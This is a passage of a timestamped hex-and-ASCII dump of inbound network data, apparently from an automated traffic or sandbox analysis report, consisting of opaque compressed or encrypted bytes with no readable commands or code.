fb 94 19 d9 50 18 52 ea 83 db 8b d1 76 Data Ascii: pJbX81gtF{BB@&ACy\][>eM0m4[^\N7{z[:D%o{Hyf-aH*7temRuZ$5uHxU8E9[m?:NK9q4[z~A5Jmo^v$6qucxZbg"GwCj[7EDPRv
2023-10-13 13:21:17 UTC	11470	IN	Data Raw: 3f ae 65 4d 57 d9 f5 b6 78 c3 53 99 36 b2 4b e3 52 e5 55 63 3f e7 2f e4 38 e1 b6 f0 db e9 e4 12 fc ca 94 16 a3 a5 4f bc b6 8f 1e 92 44 c0 57 f4 67 7a 16 be bb 5d 40 d8 70 bb 2c 10 00 39 69 25 ca b1 cc 7c 7b c7 60 44 a0 7e d0 7a dc 89 19 a3 12 93 ad 3c e6 ca d3 73 7a 12 02 e8 94 df 4f 92 73 7e 54 89 8b e8 d4 31 65 4e f4 15 7a d7 38 4f 20 50 26 35 04 e6 59 40 22 41 4c 72 1d 0e 38 a9 78 e3 99 25 03 d4 de b2 f4 58 41 92 50 60 c0 12 b2 30 a0 71 77 f9 dd 91 b9 87 f0 28 7a 47 52 ea 3b 76 cf b4 f5 ae 64 09 d8 4a 7d 26 e4 72 b3 37 35 6a 7c 5d 92 de 7d ef e9 b9 57 af 1c 54 fe 17 dc c1 0b a1 71 a6 9b 57 fd 2c d2 2c e7 0a 25 ce b3 89 f7 be d0 0d 86 6a 5e 76 a5 e3 f9 fa 0f 39 6a e9 69 bd 8e fd 85 62 f6 7a ac 63 37 c3 e4 28 05 5d 9b b3 a0 74 b7 2c 10 12 c0 6b 65 42 ba Data Ascii: ?eMWxS6KRUc?/8ODWgz]@p,9i%\|{`D~z<szOs~T1eNz8O P&5Y@"ALr8x%XAP`0qw(zGR;vdJ}&r75j\|]}WTqW,,%j^v9jibzc7(]t,keB
2023-10-13 13:21:17 UTC	11486	IN	Data Raw: 58 36 d7 26 a5 9f 9f d2 01 e5 ee 18 42 b4 80 15 cc 22 28 2e 73 27 ec f0 d9 de 17 1e c8 82 06 52 4e 76 d3 10 11 51 21 13 0c 74 b3 cb 92 20 b1 2b 5a 77 7b a7 5f da c1 e0 31 11 04 d0 c0 66 95 47 21 1c 70 97 a5 fc ce bb c5 69 8d 5a a6 31 e5 82 0e 33 38 21 bf 31 2b 02 60 94 1f d6 a8 a5 f1 86 17 e3 f7 f8 43 1c 3b 87 ee 4d f6 9b 53 54 a1 57 84 35 92 e5 ed b8 64 00 ad 68 1a 09 f7 82 0c 0a 04 d4 7a 44 e5 44 b5 24 d2 e0 b3 02 1c 97 38 ab 21 44 c3 a0 f4 8d ab 51 09 99 83 32 e1 85 81 97 d3 c2 eb a8 22 76 83 ff c0 fa a9 6c 30 fa ba 68 e1 b1 1d 9c 3f 14 17 86 42 0e 39 74 58 a8 95 99 10 5f f8 6f b5 f5 ed fd ca ac b3 a6 99 4a 10 4f 08 77 5a 9a 21 79 fd 31 38 64 65 05 57 50 96 58 77 d4 a3 0d ac 7e b8 4c e2 9e 17 4e 74 5d da 73 fc 48 38 00 2c 38 b2 2a 86 d3 68 09 9a 02 f0 Data Ascii: X6&B"(.s'RNvQ!t +Zw{_1fG!piZ138!1+`C;MSTW5dhzDD$8!DQ2"vl0h?B9tX_oJOwZ!y18deWPXw~LNt]sH8,8*h
2023-10-13 13:21:17 UTC	11502	IN	Data Raw: b8 21 c5 ff 5f e3 7e af eb c8 9b 23 fd 83 b8 86 9f e7 20 95 ab 97 9e dc a3 35 c6 57 2a a2 36 70 82 18 c1 bd 4d 8d 35 e2 5b e0 9d 14 78 6f eb 4d 4d 57 c7 af 4e 3e 56 0b bf 9f 43 22 dc ae e6 09 b0 34 4e 40 0e e3 0c 20 26 93 07 3b 88 0a 7c d7 09 2b 71 5f 56 7b 1f 3a 80 56 6c a8 21 33 5a f5 fd 95 b2 0c fa c0 60 8e 16 0d c0 a0 9f 9a e4 04 f7 7c bf a5 b2 0e 3f eb 3f 15 aa 7f 60 d1 dc d0 55 d4 9c c5 98 a8 23 82 61 3b 98 80 65 10 c9 bb 9c eb 0c a7 31 06 5f 0a 51 ce ee 2f c5 f0 f8 7d 57 5f 52 99 fd 7d 53 97 96 a6 14 2a 6b e5 2e 03 3d af dd 81 4d cf 7c ed 73 c7 84 72 a1 fc e0 b1 3a 0a 59 fc c7 15 be 7c 21 b8 85 54 0d 7e 0f 43 f0 f7 13 cb 13 d7 ad 2e ef 41 57 10 1d 6d b7 70 e2 04 db fc 09 a5 46 7e c8 39 e8 2c d6 2d 04 ce 39 b8 5c 09 b4 37 d5 7a 66 3c a2 a6 e9 d9 cc Data Ascii: !_~# 5W6pM5[xoMMWN>VC"4N@ &;\|+q_V{:Vl!3Z`\|??`U#a;e1_Q/}W_R}Sk.=M\|sr:Y\|!T~C.AWmpF~9,-9\7zf<
2023-10-13 13:21:17 UTC	11518	IN	Data Raw: 75 33 bd 5e 5d 1a 14 53 5f 13 94 78 3c 6a f1 5d 1d e3 1c 22 71 18 dc 82 5b 80 c7 08 d8 d3 f3 34 b0 a9 44 53 b6 14 cf eb e2 4d 42 78 70 ec 6c e6 bd f0 e8 53 33 72 65 cf 46 9e 88 bc ce 97 08 8c 97 db 81 b2 c1 0e 72 42 70 24 a6 77 08 be 65 1a 61 0c 8d 73 06 1a d8 21 20 a6 18 fc ce f0 77 1a 7d 87 29 14 65 3e 47 5c 77 a8 a8 8a e9 bb 7e 17 26 2c 20 8e 1c cc 4c a6 9c b8 8b 0e d4 5a f9 c4 f8 80 6a ae d0 06 09 de 0e 98 36 d8 19 96 8f eb 5a 2a 87 0d 1d 10 29 23 f8 f3 68 7b 08 bc b3 31 21 ef 44 27 5f 21 52 f8 dc 48 ff 92 8c a1 c5 6f 5d ad 29 45 9f a9 f6 a6 1e 30 6d 9e 95 ea 60 a6 ea 9f 72 88 9a 80 08 28 cd a7 ef eb 9e c5 1b 98 68 52 95 e9 2c 0f 1c 26 75 71 c4 18 06 fa 27 2a 74 3c 0c cc f9 00 64 a1 29 f4 9a 65 90 e9 f4 9b 6b fa bf 0b 64 40 86 e5 7f e6 61 7d 1d 4f 18 Data Ascii: u3^]S_x<j]"q[4DSMBxplS3reFrBp$weas! w})e>G\w~&, LZj6Z)#h{1!D'_!RHo])E0m`r(hR,&uq't<d)ekd@a}O
2023-10-13 13:21:17 UTC	11534	IN	Data Raw: 30 00 77 a8 03 b4 fa 3e c0 5e 64 0b 27 f0 74 f1 4d 8b 84 e3 05 d0 2e 05 3f 00 04 83 85 ff 45 6a 9d 00 8f 53 bc 98 7b 81 66 d4 72 f2 6e 53 3d e1 91 2e 46 42 2e 52 f6 61 dd 72 89 fd e8 e8 d9 ac 0e ff f7 e1 86 09 64 fa 26 98 a3 6b a7 e1 54 10 84 57 09 af 8e ce 96 0f 60 00 05 64 fc 89 8b b8 ed 00 96 48 6d f7 28 51 df 3c 36 99 4a c4 c1 6f c4 c7 71 e5 d6 cb 4c e2 14 72 24 8b f1 bb 50 ff ee 00 f6 7a 71 29 0d 34 ee 17 ac 57 80 d3 88 f0 a2 e9 37 ad f7 7b a3 d6 7b 00 c8 56 ff b2 f8 02 8d 00 e8 25 c9 66 57 5d d8 7f 83 80 8c 4a 87 b2 b0 cb 96 17 b4 37 66 0a eb 63 8d 2b ff 00 8d 50 8b 00 67 5a 3a 16 ae 46 87 29 fa f6 1d 55 0b e8 e6 a9 aa 28 d7 60 6a 9e a3 00 eb 89 9d 85 89 10 98 00 20 18 4c 57 5b fc c8 21 55 be 47 38 af fd c6 17 34 63 83 9d b8 dc 11 6c 24 bc 4d 65 fa Data Ascii: 0w>^d'tM.?EjS{frnS=.FB.Rard&kTW`dHm(Q<6JoqLr$Pzq)4W7{{V%fW]J7fc+PgZ:F)U(`j LW[!UG84cl$Me
2023-10-13 13:21:17 UTC	11550	IN	Data Raw: c4 6a 68 81 78 7e 7f 58 f3 9f f5 c2 3a 54 0c 77 4b c3 c4 6d 70 78 4a 35 d8 64 ad a5 63 27 d7 b6 bc 91 ba b0 ac 66 c9 84 ad 61 a9 78 be 7b 28 09 75 6c 6d 0c 5a 71 71 15 71 50 ad 1d 18 99 15 5e 13 2d 44 81 e5 04 f7 fb 61 2a bf b4 7f 09 f2 e9 73 ee e2 52 fb c5 51 86 f8 27 23 9e 40 96 55 19 b2 07 2e ff 8a a0 b3 48 f5 c1 5f 7d e7 48 13 9f 2c 11 4b 48 bd bb 92 10 54 b1 37 32 42 68 41 6e 80 e5 9f 30 03 82 a3 f1 53 f0 b1 dc 5e 7f 33 b5 89 9c cf f6 07 9b dc 3a 6e b7 11 de 87 56 7f e5 65 90 c1 1c b8 f2 71 7e 62 7e dd d9 4a f6 fa b1 70 59 98 63 42 ad d6 8d 2d ff d9 ad 76 a8 b8 07 49 d1 ba cc 12 38 c3 78 0b 33 0a 7b 15 f5 0f 1b cc 0f cc 98 d5 3a 2a 90 79 53 b6 a5 77 a6 94 5c 15 6e b3 48 78 9c 41 67 35 d7 61 cb 27 c4 1b 7c 82 86 94 9c 28 88 7e cc 3a 79 d1 ce f2 98 ba Data Ascii: jhx~X:TwKmpxJ5dc'fax{(ulmZqqqP^-DasRQ'#@U.H_}H,KHT72BhAn0S^3:nVeq~b~JpYcB-vI8x3{:ySw\nHxAg5a'\|(~:y
2023-10-13 13:21:17 UTC	11566	IN	Data Raw: 2f 94 e5 56 58 0c 90 31 87 d2 da de c1 6b 06 17 06 fe 12 d1 a0 16 2b 9d bb a6 62 51 3a 4d a0 e7 c7 db d7 a4 2c 14 7a 7c e1 b3 2e b4 e5 b1 c1 c9 d0 c6 5b 90 29 30 f2 9e f5 b2 03 e9 8f df 7e af be 98 01 96 04 d2 49 14 34 9c e4 10 47 60 2b c9 6e 68 6f f6 6a a4 72 2f 1b a9 19 8b 57 fd 5e 89 fd 91 8b 33 49 8e a4 80 68 54 24 fa 4f be ec a0 c7 ab 78 0c cc ba 53 d8 18 54 cd 3e f9 ee ea fe 6b 8f 9c 84 62 90 35 49 66 a2 16 79 65 15 ac d5 c4 57 9d da b6 ba 3d 23 d1 79 46 0b de fc c8 96 f0 5a 5e 90 b7 20 a2 f6 15 50 e2 95 f2 ac 13 f1 4c 34 05 67 91 ec d8 95 30 e1 ae f9 6d 6e a1 d8 74 bb f7 60 b1 86 94 10 5e 25 af 57 5d cb c8 7b 47 09 d9 bc c4 98 cb b9 1c 55 2b 11 0e 8c 1d 4c e0 78 90 fc b7 0a b3 1f 28 e9 a6 c7 0e ba 75 fc 9d a1 41 e1 b7 06 bf 14 7e 9b e6 5a 29 9e e4 Data Ascii: /VX1k+bQ:M,z\|.[)0~I4G`+nhojr/W^3IhT$OxST>kb5IfyeW=#yFZ^ PL4g0mnt`^%W]{GU+Lx(uA~Z)
2023-10-13 13:21:17 UTC	11582	IN	Data Raw: 9b bf 62 2a 37 9a a1 09 1a 04 bf fa 49 81 ff b7 c1 38 5f 35 cf b4 0c 05 9e e8 18 fd 11 74 69 17 d3 26 f4 98 ab c2 2b 74 14 05 b4 f0 0c e7 5a 89 2c 21 48 14 f8 ee 73 26 78 14 58 b5 07 25 e7 ff 6a 02 be aa 23 a0 9a 2c 07 0e 0a 6c 0e b6 65 a9 6a e2 fd 9b da 82 94 d7 3f 2c 0e 77 6f 63 68 f9 48 1b e8 67 08 7c 96 b8 dc e6 ea 76 b6 35 c6 a0 63 45 a5 d1 dc b8 15 a1 db f6 62 4a b1 75 93 8e 56 39 9a d8 c1 9e c6 a1 7a 55 7b 15 6c ab 25 f5 ff 11 6a be 66 d8 9e 0b 34 3b 7c 37 35 a2 11 46 7b 25 fb 05 b6 4e d3 6f c9 23 e7 51 99 62 2c 31 27 0e 72 6c e0 2a d9 9e 33 c4 83 45 64 34 8a a8 a0 a5 34 f5 50 d4 65 a9 b1 17 54 34 a4 a1 82 db c2 04 e6 e0 b3 f6 6c e1 bf 57 a0 7d a5 72 a6 3d ab 83 6d b0 f6 78 24 d7 1b fb ec c3 f5 b0 ce 7c b8 bb ee 25 46 84 01 5d c1 be fc e7 61 a4 0d Data Ascii: b7I8_5ti&+tZ,!Hs&xX%j#,lej?,wochHg\|v5cEbJuV9zU{l%jf4;\|75F{%No#Qb,1'rl3Ed44PeT4lW}r=mx$\|%F]a
2023-10-13 13:21:17 UTC	11598	IN	Data Raw: 0c 70 ca 06 e9 df fe 16 29 b2 e1 ad 36 a4 16 d0 97 f8 58 7c 72 ac 99 fe 52 ed 6e 81 2a cd a9 e8 9a 33 47 de 70 12 8c 2a 70 dc 6c 47 58 39 2d 33 1e f4 49 87 7b 35 98 c7 ac f5 ae fb 77 ad 81 7e 6b 50 4f 15 6c 7c be 43 6e eb 44 da 80 2f c9 d5 0c 9e 89 65 5d 8a 3f 49 60 b5 7f 62 ae 03 63 86 c9 71 6a 93 a5 45 9c c7 6a 87 f0 4f 78 af f2 1d ab 9f a0 fe df d3 95 eb b6 d6 69 9e 98 f7 56 68 fb 3c 1f 41 e4 97 2c 20 ac 57 f9 8d 07 e1 b1 73 42 9f 15 3a cb 37 a3 15 f6 00 f3 98 fd b1 63 8c 49 5b f6 06 ef 98 79 b6 7c 04 e7 7c f5 ec 0e 40 19 45 71 02 e8 df 70 2f 68 da a6 37 a6 58 92 5b fa 74 78 cb 8f 72 89 ef 22 36 41 04 0a fa 10 eb 77 3b 3c 3d fe f4 05 a2 54 0e 09 63 59 16 e9 3c 58 30 2d 77 8d 4b 64 35 e7 95 8f 0e 0e 31 c0 dc a6 27 fd d4 d5 9c 69 d5 03 42 a5 04 e0 11 73 Data Ascii: p)6X\|rRn3GpplGX9-3I{5w~kPOl\|CnD/e]?I`bcqjEjOxiVh<A, WsB:7cI[y\|\|@Eqp/h7X[txr"6Aw;<=TcY<X0-wKd51'iBs
2023-10-13 13:21:17 UTC	11614	IN	Data Raw: 50 5f 94 12 99 da 71 13 5d d2 f5 b7 c4 b9 40 68 8a 33 57 ad f1 f8 38 ac f9 fe 2d f1 cf d6 65 6d 82 56 c0 c0 fc 77 e9 ba 2f 81 a9 1f 8e 65 7a aa be 69 5b 54 8d 0a e2 d5 22 1d 97 6a 76 36 7e d9 02 4e f5 b2 ba 9f c0 d6 39 d2 62 3d 3c 5c ae f3 54 25 9c 62 d7 6a 60 d7 17 e3 b8 3e d6 27 85 30 f8 4f 9d 2f 7a da df 30 a3 d0 87 59 78 29 c2 0a 74 6e 84 21 78 a0 99 7a 00 59 fa b4 97 31 61 3a 8c 63 1f 81 e6 af 2d 8e 94 81 80 bb e8 52 a0 b9 46 4d 7b d8 18 36 76 85 04 87 c4 14 61 db fb c0 e6 8f e4 ef a4 a6 92 b9 36 ed b5 ab 36 5f 2f c7 f2 ca e7 cf 5f b2 dd c2 4d 74 7f a6 db ae 3a 88 2e de 53 c1 5d 48 f6 7a af 1d 8f 71 08 d9 58 fc 9f ec 32 4e f4 9c b9 f8 01 29 92 b3 af 31 06 5c 8b 56 d4 3f b9 1d 42 97 28 19 75 55 06 48 02 20 76 bc c4 9d 80 7d ef ef 49 ad 65 81 83 ed 47 Data Ascii: P_q]@h3W8-emVw/ezi[T"jv6~N9b=<\T%bj`>'0O/z0Yx)tn!xzY1a:c-RFM{6va66_/_Mt:.S]HzqX2N)1\V?B(uUH v}IeG
2023-10-13 13:21:17 UTC	11630	IN	Data Raw: 65 eb cc 19 c2 ea dc 3d da a7 d5 45 d5 92 d4 9b 6f 4f de c4 eb 98 f3 e7 47 62 5d 8f b0 3e 48 af 37 02 97 e6 c5 a8 f4 04 4c 75 29 cd 3f 5d ae fc 43 a5 82 8a 26 ca 3d 2f 10 a1 66 29 f7 bf 02 3b 58 1a 6c f8 23 f0 6b 41 f6 e7 81 0b 8e 75 81 65 79 81 64 b9 10 4a 5b 51 a4 87 27 1d f7 d0 a8 b2 ee 3c b4 96 83 4a 2a ba 00 04 46 47 69 61 35 9d 39 eb ec 97 51 a1 34 14 2d 1d 09 b3 58 f9 25 dd 22 6f d6 07 8f 3f 18 38 91 d5 df c9 7a aa b3 6b ab ea 82 6e 91 56 b1 40 d2 6b 73 33 c2 c4 5e 82 1b bc 3b 95 ed 57 1d 83 d3 61 b4 d9 67 d7 e2 99 f7 86 8f 85 78 f2 b9 9d ba 78 ce e5 dd b6 3d 6a 03 2a 4a 87 46 19 21 64 ec b1 2e bf d9 71 ab ee 44 c8 7a 24 ad fc 34 f2 0e 4d 81 11 50 5a a9 5e 00 c2 6b 25 42 0d 0d a1 05 cd b4 c3 78 00 f5 32 bb b8 ab 93 da fd 0a 0a f6 f2 f4 ff c4 35 8b Data Ascii: e=EoOGb]>H7Lu)?]C&=/f);Xl#kAueydJ[Q'<JFGia59Q4-X%"o?8zknV@ks3^;Wagxx=jJF!d.qDz$4MPZ^k%Bx25
2023-10-13 13:21:17 UTC	11646	IN	Data Raw: 0f d7 68 7a 78 03 1f eb fb 48 68 57 7b b4 d3 e6 6a 67 cd 54 6b 66 da e4 38 ae 21 94 c6 8c 2d 91 a6 2b f1 ed ae 6e 0d 8e d8 00 4f 69 69 a8 7b f0 55 e1 4e c9 e1 a9 c0 bf 8a 99 8a fd 25 35 e7 78 47 85 9d ad e6 e4 3e 8c 40 17 ab b3 fb a0 d9 df 8d 54 d7 9f dd 2b 0f 4a 2a 57 cb 32 2c 97 fb 19 78 cc 35 e3 28 cc fc 8d ba 75 44 5d 38 05 35 5b 99 a9 2f ff 67 53 0e 2b a1 d0 ae 5a e2 19 b1 1a c2 e8 7f b7 7b 8e 8e 38 cf 03 e2 8f 29 3e d7 0b 02 c7 1e 10 86 89 04 0a 76 ec fa 9f 4f 23 51 23 ac c1 44 51 e8 92 3b 36 07 a8 4e 70 d6 b3 07 98 50 96 6c fc 42 36 3b 91 32 94 77 27 7d 1d 23 de bf 40 4d d8 76 41 4d 2f e9 4d 4e 29 46 cd 0d aa 0a fe e0 e9 a5 c1 fa 67 5c af ed 1b 71 70 6f f1 82 4c 60 75 2e 02 0b cb fe d8 ac e2 81 f3 31 e9 b8 e8 44 01 b4 92 89 33 7d 25 24 a3 36 83 7d Data Ascii: hzxHhW{jgTkf8!-+nOii{UN%5xG>@T+J*W2,x5(uD]85[/gS+Z{8)>vO#Q#DQ;6NpPlB6;2w'}#@MvAM/MN)Fg\qpoL`u.1D3}%$6}
2023-10-13 13:21:17 UTC	11662	IN	Data Raw: c2 04 fc 57 1a 8a 8f 04 3a 25 15 0b b3 92 d4 4f 93 62 f7 42 fa ff 39 87 ed f0 dd d9 69 5b e1 2a bb cb 72 0f 0e 33 a2 5a 45 33 58 08 0b 99 87 5d 27 29 a1 4d 14 a1 4e 1e d0 f7 59 4a f4 e4 ea a9 04 a5 fa cf 08 00 02 b2 5b 84 f5 90 c2 15 71 0f c0 a7 30 a5 27 49 c4 3a f2 65 83 0a 52 46 bf d0 06 d9 3a 20 ef b7 d8 14 e3 62 96 2b c0 ce ba 6d c4 23 4c d1 1c c1 c4 e3 ba 84 04 a1 6b 48 88 a6 28 af db 8a ab 21 4c 87 45 14 e1 60 ee 8d 8c 7d 9d e5 9c 5a da d0 76 22 90 9b 84 96 27 b4 6c 34 d2 6f 85 94 25 06 86 14 e9 e2 80 b7 33 18 0d 4a b3 35 c9 c8 49 3e 01 ff dd f2 aa 72 6f 51 94 81 6c 61 df c7 44 2f ad c3 38 13 19 b9 78 38 67 da 6c 5b 7b a2 51 d3 8f 81 08 d0 20 bd 2a e7 29 96 5f cd 93 aa f0 62 eb 9a 99 f1 55 ee a4 b6 c0 35 32 a0 5a 70 db 57 46 b1 79 7f 8c fe 41 3e 51 Data Ascii: W:%ObB9i[r3ZE3X]')MNYJ[q0'I:eRF: b+m#LkH(!LE`}Zv"'l4o%3J5I>roQlaD/8x8gl[{Q )_bU52ZpWFyA>Q
2023-10-13 13:21:17 UTC	11678	IN	Data Raw: 51 82 3d 9f 5d ad a5 90 71 2b 3e 1b 1e bc 52 23 72 f0 09 1a 8d 31 1f a4 74 06 d6 79 25 95 2e 8f ea 6a 54 77 f2 76 57 07 1d 59 21 38 16 e3 a4 52 a6 d8 53 46 47 f3 d3 5a f8 2d f2 0b 4f 3e d7 2e d4 63 7b 57 8b 62 57 7f d2 cb 5f e0 6d 7f 2e 23 df 76 81 bd fb bc e9 96 b9 bb bc eb 4d c0 4c 74 75 b7 5b c8 12 39 cd 00 fa c8 9f 9b 0c 59 18 a1 84 12 3d 0a 8f 53 89 5f 21 fa dd a1 06 e3 b5 6a 37 ad 9c 52 6e c3 e1 94 fc 9a 8b f0 da 37 89 d2 fd f4 2d b3 ed 82 db be 98 31 fd b7 63 6e 39 18 81 8d e6 7c 88 c9 bb 40 41 88 c9 67 bf e2 ab be b2 64 fb 40 fc 10 07 bb 84 a8 c4 b3 4a 2b 02 85 bc 9f e0 cf 47 11 83 0f 30 da 02 89 a3 23 a4 6e 0c aa 4d 3a a5 c5 34 5d 4f a7 d9 1d a6 e1 36 ba 4f 2c 34 d2 93 65 60 07 31 d8 de de 6f c0 9d ea 72 0e cb 29 cf 69 8b ad 61 76 e5 7e 5c 58 fe Data Ascii: Q=]q+>R#r1ty%.jTwvWY!8RSFGZ-O>.c{WbW_m.#vMLtu[9Y=S_!j7Rn7-1cn9\|@Agd@J+G0#nM:4]O6O,4e`1or)iav~\X
2023-10-13 13:21:17 UTC	11694	IN	Data Raw: 18 d6 d3 e1 00 7e e7 a1 cf ba 1c a9 32 67 2b 89 e6 cf f8 52 7e 1a f3 21 64 04 c0 fb 1d d0 19 e0 d0 7c f3 1a 08 35 df d5 b8 0c b3 f4 7f ea 69 21 2d c1 46 26 86 04 3e 7b 45 58 96 1f 63 8b cb aa 98 c5 b2 a3 22 fc e0 0f c4 ad 4b 49 11 c8 31 18 ea eb 38 fe 44 d3 d6 ce 2e 0e f2 81 12 f5 cb 48 3a d9 18 e4 96 7c 71 35 bb c3 ed 11 2f a8 0b 57 e3 75 d5 43 00 2e 42 02 e6 4e dc 89 70 b6 a2 a1 7d e2 2e 46 ac 5d 1a 32 66 77 a0 b3 20 34 80 c5 e1 86 26 5c 02 bf 0b 00 34 40 5b 9f c7 76 d7 9e 29 07 fc 30 ac 47 65 eb 8b f0 6d 98 2e 12 18 4a ac 48 32 b1 92 2c b8 af e2 0c 77 2c 5e dd f3 26 06 6f 89 0b de e2 d7 4a f3 58 5b 27 a0 eb 5a ce 0d e1 02 ab f8 1e d2 f8 b7 d9 39 97 7d 92 7d 21 db 43 de 3e 8a d5 fb 36 67 d5 73 c8 be 67 ce 3a ca 7a 9e b1 7c 3d e1 c2 7b d0 a9 48 6c 3f fe Data Ascii: ~2g+R~!d\|5i!-F&>{EXc"KI18D.H:\|q5/WuC.BNp}.F]2fw 4&\4@[v)0Gem.JH2,w,^&oJX['Z9}}!C>6gsg:z\|={Hl?
2023-10-13 13:21:17 UTC	11710	IN	Data Raw: 27 f1 ee 64 b9 01 09 88 2e a8 84 b8 bd 2e af cf b3 84 82 d8 da 08 f3 6b 2a 39 b9 44 59 72 80 dd 12 73 75 9b 50 ca 4f 48 c7 85 fa 4d 09 0e be 4e 74 8b 4f 7e 90 66 cf 9b ba ba fe 31 7d 8c 73 2c fe 04 6c aa 7e af 58 df 50 9f 56 69 4a 3a db 5f c5 4c 9c 21 5c da 0a de 53 3d 08 03 d2 26 4d f9 b0 09 90 2d 83 ad 6e 87 fc 83 77 0e 5b 27 69 b7 55 49 6b c1 5f 0d f3 48 66 66 f0 f2 f5 3e 4b 28 f8 b9 dc 99 c0 0f c2 25 37 14 23 71 c6 e2 f9 61 0e 71 db f1 16 dd 54 67 12 d9 05 f3 d5 69 f6 90 6e b3 e9 7f 17 5a e1 29 60 7e 35 e5 45 4c 0a dd 99 c5 41 38 68 31 34 dd 79 db 59 3c 19 70 d9 7a 43 ff 12 83 8a dd 9c 5a 34 8e 20 f6 8a 25 1a 77 7c b5 0d b9 85 1a cf b5 f4 93 2a 64 ed ac eb 05 fe 06 1f 69 96 d8 46 5b 69 63 d0 81 c0 70 43 d2 64 85 58 a9 45 95 8d bd 42 6e 07 8d c1 30 d5 Data Ascii: 'd..k9DYrsuPOHMNtO~f1}s,l~XPViJ:_L!\S=&M-nw['iUIk_Hff>K(%7#qaqTginZ)`~5ELA8h14yY<pzCZ4 %w\|diF[icpCdXEBn0
2023-10-13 13:21:17 UTC	11726	IN	Data Raw: 9d ed 57 d2 7b 44 84 4c 1e 17 eb 57 10 8c e3 39 62 61 e4 67 73 30 6d e2 3f 6f da 85 9a 1e ed 65 0a 5c 01 5d b7 3c da 8a d3 4a ce 00 2d cc b3 4a 55 d0 31 4f 77 b8 a4 78 fe f0 70 28 56 e7 41 3f 8e 48 f7 e1 6c 5e 49 5a 7a 3b 0c 36 f4 f7 17 d8 aa cf 8b ed f5 d3 e5 0c 11 88 5a 84 01 76 5a 4b ab e1 37 94 2d 6f da eb 51 da 13 a2 83 31 f0 d0 14 de b6 3c 40 14 16 11 bb 80 83 71 3b 87 f0 d7 e0 cd 0f 9b 6a a9 99 ac af b7 cc 09 29 71 dd ed 14 91 d3 c0 0b 5b e9 88 3f 65 c2 ea b8 6f af f6 89 a2 a9 d6 80 d9 d7 29 1f 6e f1 52 c7 36 96 22 3f 08 c0 3a c7 e6 30 84 7e 61 cf 6e a9 12 60 b0 81 0e 32 16 51 75 97 f2 20 88 66 ee 61 f6 be 0b ee 60 76 0f 52 7f 9c 24 34 13 6f e9 b8 fb 8c e1 82 78 49 b2 4c 7a 86 b1 f3 af 11 69 48 d2 01 7d d2 f4 14 13 bf 87 66 9d 8f 22 13 61 4e 0b 8d Data Ascii: W{DLW9bags0m?oe\]<J-JU1Owxp(VA?Hl^IZz;6ZvZK7-oQ1<@q;j)q[?eo)nR6"?:0~an`2Qu fa`vR$4oxILziH}f"aN
2023-10-13 13:21:17 UTC	11742	IN	Data Raw: 76 d9 fd d3 96 6b ef b9 9f 4d 43 64 65 e4 d9 b4 8b 0b be 60 aa 9f c7 4f 2d 9d 05 87 5e 7a 7d 56 55 6d 0c 4b 6e 7c 36 0c 55 97 ed 76 b8 76 4d ee a0 1a 86 30 b4 b4 f5 3f 10 17 44 06 6d fe 81 c6 53 54 6f 49 42 23 34 68 32 d8 38 03 c1 96 90 64 fb 1c c8 42 7e f7 d3 f5 7a 7f 83 35 bf 3d e0 3c ae 56 84 e3 5e 63 91 ab 80 f3 7e ba 8b e8 96 17 0a 77 8f 64 98 37 83 f2 33 5b 50 fe 79 12 b0 e7 66 0b 97 8f 87 19 6f ba 39 d8 20 bc 52 1e 52 a0 87 ed 70 10 a6 d1 8e c7 db 6f 68 99 91 f9 bd b1 23 b3 f7 59 15 d3 f4 9c c3 71 d0 12 8f ee 86 91 4a 10 a9 b2 56 32 82 8b 61 7d e5 ac 5e 97 2c 97 15 bb 83 f1 63 0d 03 b7 ad 59 9b 7e 99 6f f4 a8 c9 e9 80 6d 7f 2e 11 68 86 8a 16 e5 48 54 d0 e0 81 02 60 cf 1b a5 d7 57 c4 64 f3 00 ef eb 7e f4 c3 b1 d8 76 0f 58 63 15 19 5e 24 1a 40 85 cc Data Ascii: vkMCde`O-^z}VUmKn\|6UvvM0?DmSToIB#4h28dB~z5=<V^c~wd73[Pyfo9 RRpoh#YqJV2a}^,cY~om.hHT`Wd~vXc^$@
2023-10-13 13:21:17 UTC	11758	IN	Data Raw: cb 21 73 9c 4d eb 3e 0a be b7 05 a1 0a ad 50 87 28 b7 d8 ad 84 df d6 12 94 04 63 c2 8c bd b4 79 2a c8 52 e0 50 2b bd ce 61 6e 22 b8 54 af c0 b8 44 d8 37 0d 2a fd e4 8c ce e9 3a b0 51 22 58 ab d5 99 0b d7 0f 37 91 2a 19 db 48 1b 42 8d 69 49 14 bc 42 01 6b da a7 d4 d9 32 5f ea 92 84 8a ed ea b6 10 39 86 a1 1d c2 f1 c7 9d 18 b1 d0 6a 61 6c f2 6a 30 a8 ba e9 45 9c 80 7f c7 8e 73 7a 84 ae 8b 16 16 59 11 9d 2e 1c 34 f1 9b 4d 3a cb ad 71 db af 78 2e c3 a0 f2 21 74 4a 5d ba d1 9e 35 62 1b 90 1b 95 79 62 1f 6d 6b 86 3e 71 d1 8c e8 38 8e 8b 97 24 74 bb 86 31 69 b8 63 ab aa a0 d9 35 be c9 7a 0e 93 52 04 75 a8 98 16 8d bf 4c 1a cf 9f 06 9b 6b 5d 0f 96 f7 a1 6a a1 b6 f6 b6 02 83 a3 6e 9a ad 3c b6 fd 85 af c6 cf b3 21 25 06 4a 9c 48 cf 39 fd 7e 21 5b 09 c2 29 dd e8 c1 Data Ascii: !sM>P(cyRP+an"TD7:Q"X7*HBiIBk2_9jalj0EszY.4M:qx.!tJ]5bybmk>q8$t1ic5zRuLk]jn<!%JH9~![)
2023-10-13 13:21:17 UTC	11774	IN	Data Raw: 7b 00 a9 59 d5 d7 dc 3d 39 75 22 6a b4 76 b9 2f a4 43 a2 a2 c0 6e 91 52 10 e2 0c 3d 96 f7 59 93 b0 da a2 d9 6d ff d1 d4 56 d0 e6 91 82 2a 29 e4 7f 0a 3a 10 56 83 99 fe 5c 2a a9 6c ae 0e 2b f1 d4 b2 1e f4 dd ce 94 49 9e 17 dc 35 a5 42 18 fa 0b 3b 0d e0 21 a5 9c f4 4b ef ea 05 54 ef f8 14 34 aa ed c9 20 f0 eb da 1e 42 75 b7 c4 8c a6 21 00 13 8b bf 2b 74 9a 20 ed c4 8a e1 c2 99 bb 4a 3d 33 c4 dd ae ca f2 1e e7 bc 6a 8c 7f ac b0 27 65 bb 6e 62 68 eb cc ff 53 3b a3 e7 5e 53 bd 37 af d7 de 6d 94 f8 3c df 6e 17 d6 48 bf 1e 4c 7f fb ec 5b 6a 0e 35 ac cc 80 88 aa de 94 1b 64 9f 95 43 d5 09 d2 e5 70 85 7e 98 e7 e7 8f 79 d2 